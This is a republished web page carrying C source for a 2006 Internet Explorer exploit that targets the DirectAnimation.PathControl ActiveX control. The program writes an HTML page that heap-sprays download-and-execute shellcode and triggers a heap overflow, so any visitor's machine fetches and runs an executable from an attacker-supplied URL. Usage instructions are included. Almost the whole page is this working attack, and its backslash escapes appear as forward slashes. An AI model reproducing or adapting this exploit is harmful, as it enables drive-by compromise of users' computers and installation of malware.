Internet Explorer COM Object Heap Overflow Download Exec Exploit

來源:互聯網
上載者:User
/*
*-----------------------------------------------------------------------
*
* daxctle2.c - Internet Explorer COM Object Heap Overflow Download Exec Exploit
* !!! 0day !!!  Public Version !!!
*
* Copyright (C) 2006 XSec All Rights Reserved.
*
* Author   : nop
*          : nop#xsec.org
*          : http://www.xsec.org
*          :
* Tested   : Windows 2000 Server SP4 CN
*          :     + Internet Explorer 6.0 SP1
*          : Windows XP SP2 CN
*          :     + Internet Explorer 6.0 SP1 (You need some goodluck!
*          :
* Complie  : cl daxctle2.c
*          :
* Usage       :d:/>daxctle2
*          :
*          :Usage: daxctle <URL> [htmlfile]
*          :
*          :d:/>daxctle2 http://xsec.org/xxx.exe xxx.htm
*          :
*          
*------------------------------------------------------------------------
*/

#include <stdio.h>
#include <stdlib.h>

FILE *fp = NULL;
char *file = "xsec.htm";
char *url = NULL;

// Download Exec Shellcode by nop
unsigned char sc[] =     
"/xe9/xa3/x00/x00/x00/x5f/x64/xa1/x30/x00/x00/x00/x8b/x40/x0c/x8b"
"/x70/x1c/xad/x8b/x68/x08/x8b/xf7/x6a/x04/x59/xe8/x43/x00/x00/x00"
"/xe2/xf9/x68/x6f/x6e/x00/x00/x68/x75/x72/x6c/x6d/x54/xff/x16/x95"
"/xe8/x2e/x00/x00/x00/x83/xec/x20/x8b/xdc/x6a/x20/x53/xff/x56/x04"
"/xc7/x04/x03/x5c/x61/x2e/x65/xc7/x44/x03/x04/x78/x65/x00/x00/x33"
"/xc0/x50/x50/x53/x57/x50/xff/x56/x10/x8b/xdc/x50/x53/xff/x56/x08"
"/xff/x56/x0c/x51/x56/x8b/x75/x3c/x8b/x74/x2e/x78/x03/xf5/x56/x8b"
"/x76/x20/x03/xf5/x33/xc9/x49/x41/xad/x03/xc5/x33/xdb/x0f/xbe/x10"
"/x3a/xd6/x74/x08/xc1/xcb/x0d/x03/xda/x40/xeb/xf1/x3b/x1f/x75/xe7"
"/x5e/x8b/x5e/x24/x03/xdd/x66/x8b/x0c/x4b/x8b/x5e/x1c/x03/xdd/x8b"
"/x04/x8b/x03/xc5/xab/x5e/x59/xc3/xe8/x58/xff/xff/xff/x8e/x4e/x0e"
"/xec/xc1/x79/xe5/xb8/x98/xfe/x8a/x0e/xef/xce/xe0/x60/x36/x1a/x2f"
"/x70";    

char * header =
"<html>/n"
"<head>/n"
"<title>XSec.org</title>/n"
"</head>/n"
"<body>/n"
"<script>/n"
"shellcode = unescape(/"%u4343/"+/"%u4343/"+/"%u4343/" + /n";

// Change this script by yourself.
char * footer =
"bigbk = unescape(/"%u0D0D%u0D0D/");/n"
"headersize = 20;/n"
"slackspace = headersize + shellcode.length/n"
"while (bigbk.length < slackspace) bigbk += bigbk;/n"
"fillbk = bigbk.substring(0, slackspace);/n"
"bk = bigbk.substring(0, bigbk.length-slackspace);/n"
// bk = nop+nop;-)
"while(bk.length+slackspace < 0x40000) bk = bk + bk + fillbk;/n"  
"memory = new Array();/n"
"for (i=0;i<800;i++) memory[i] = bk + shellcode;/n"
"var target = new ActiveXObject(/"DirectAnimation.PathControl/");/n"
"target.KeyFrame(0x7fffffff, new Array(1), new Array(65535));/n"
"</script>/n"
"</body>/n"
"</html>/n";

// print unicode shellcode
void PrintUc(char *lpBuff, int buffsize)
{
   int i,j;
   char *p;
   char msg[4];

   for(i=0;i<buffsize;i+=2)
       {
       if((i%16)==0)
       {
           if(i!=0)
           {
               printf("/"/n/"");
               fprintf(fp, "%s", "/" +/n/"");
           }
           else
           {
               printf("/"");
               fprintf(fp, "%s", "/"");
           }
       }
           
       printf("%%u%0.4x",((unsigned short*)lpBuff)[i/2]);
       
       fprintf(fp, "%%u%0.4x",((unsigned short*)lpBuff)[i/2]);
     }
     

       printf("/";/n");
       fprintf(fp, "%s", "/");/n");          
   
   
   fflush(fp);
}

void main(int argc, char **argv)
{
   unsigned char buf[1024] = {0};

   int sc_len = 0;

        if (argc < 2)
   {
         printf("Internet Explorer COM Object Remote Heap Overflow Download Exec Exploit/n");
         printf("Code by nop nop#xsec.org, Welcome to http://www.xsec.org/n");
         //printf("!!! 0Day !!! Please Keep Private!!!/n");
       printf("/r/nUsage: %s <URL> [htmlfile]/r/n/n", argv[0]);
       exit(1);
   }
   
   url = argv[1];
   
   //if( (!strstr(url, "http://") &&  !strstr(url, "ftp://")) || strlen(url) < 10 || strlen(url) > 60)
        if( (!strstr(url, "http://") &&  !strstr(url, "ftp://")) || strlen(url) < 10)
        {
            //printf("[-] Invalid url. Must start with 'http://','ftp://' and < 60 bytes./n");
            printf("[-] Invalid url. Must start with 'http://','ftp://'/n");
            return;                
        }

      printf("[+] download url:%s/n", url);
      
      if(argc >=3) file = argv[2];
      printf("[+] exploit file:%s/n", file);
       
   fp = fopen(file, "w");
   if(!fp)
   {
       printf("[-] Open file error!/n");
          return;
   }    
   
   // print html header
   fprintf(fp, "%s", header);
   fflush(fp);
   
   // print shellcode
   memset(buf, 0, sizeof(buf));
   sc_len = sizeof(sc)-1;
   memcpy(buf, sc, sc_len);
   memcpy(buf+sc_len, url, strlen(url));
   
   sc_len += strlen(url)+1;
   PrintUc(buf, sc_len);
 
   // print html footer
   fprintf(fp, "%s", footer);
   fflush(fp);  
   
   printf("[+] exploit write to %s success!/n", file);
}

相關文章

聯繫我們

該頁面正文內容均來源於網絡整理,並不代表阿里雲官方的觀點,該頁面所提到的產品和服務也與阿里云無關,如果該頁面內容對您造成了困擾,歡迎寫郵件給我們,收到郵件我們將在5個工作日內處理。

如果您發現本社區中有涉嫌抄襲的內容,歡迎發送郵件至: info-contact@alibabacloud.com 進行舉報並提供相關證據,工作人員會在 5 個工作天內聯絡您,一經查實,本站將立刻刪除涉嫌侵權內容。

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.